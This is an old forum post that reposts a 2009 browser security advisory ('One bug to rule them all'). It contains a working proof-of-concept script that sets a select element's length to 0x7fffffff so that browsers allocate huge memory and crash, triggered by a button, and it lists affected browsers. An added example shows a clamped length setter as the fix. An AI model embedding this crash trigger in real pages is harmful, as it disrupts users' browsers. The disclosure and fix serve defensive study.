Topic: DOM hole crashes most browsers
john77 (SV!) (18.07.2009 / 17:50)
<script>
// PoC: set a huge length on a detached <select>; the value is not clamped.
function poc() {
  var e = document.createElement("select");
  e.length = 2147483647; // 0x7fffffff
}
function go() {
  poc();
}
</script>
<form>
<font face= "courier new" size ="2">
Reference : [GSEC-TZO-26-2009] - One bug to rule them all<br>
WWW : <a href="http://www.g-sec.lu/one-bug-to-rule-them-all.html">G-SEC</a><br>
Credit : Thierry Zoller <br>
Root Cause : Design bug (non clamped)<br>
<br>
Browser will allocate huge chunks of memory and then most likely crash.<br>
Known patches: Firefox, Chrome, Safari, Opera<br>
Still vulnerable : IE5, IE6, IE7, IE8, WII, PS3, Nokia, Blackberry, Konqueror<br>
<b>Click "Select length 0x7fffffff"</b><br><br></font>
<input onclick="go()" value="Select length 0x7fffffff" type="button">
</form>
</body></html>
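The advisory gives the root cause as a length that is "non clamped". The sketch below is an added example, not part of the original post or of any browser's code: it models a length setter that refuses an oversized request before allocating. `setSelectLength`, `MAX_OPTIONS` and the cap value are assumptions, and the `<select>` is modelled as a plain object so the code runs outside a browser.

```javascript
// Assumed cap on the number of options; hypothetical name and value.
const MAX_OPTIONS = 100000;

// Model of a clamped length setter for a <select>-like object.
// Returns what happened instead of allocating blindly.
function setSelectLength(select, requested) {
  // Coerce the way a DOM "unsigned long" attribute does (ToUint32),
  // so negative input wraps to a large positive number.
  const n = Number(requested) >>> 0;
  const current = select.options.length;

  if (n > current) {
    // Growing: check the cap BEFORE any allocation happens.
    if (n > MAX_OPTIONS) {
      return { applied: false, length: current, reason: "over-cap" };
    }
    for (let i = current; i < n; i++) {
      select.options.push({ text: "", value: "" }); // empty placeholder option
    }
  } else {
    // Shrinking (or no change) never allocates, so it is always allowed.
    select.options.length = n;
  }
  return { applied: true, length: select.options.length, reason: "ok" };
}

// Constructed sample run, including the value used by the PoC above.
function demo() {
  const select = { options: [] };
  return [
    setSelectLength(select, 3),          // normal growth
    setSelectLength(select, 2147483647), // 0x7fffffff from the PoC: refused
    setSelectLength(select, -1),         // wraps to 4294967295: refused
    setSelectLength(select, 1),          // shrink: allowed
  ];
}
```

A refused request leaves the existing options untouched, so a page that sets an absurd length sees no change instead of forcing a huge allocation.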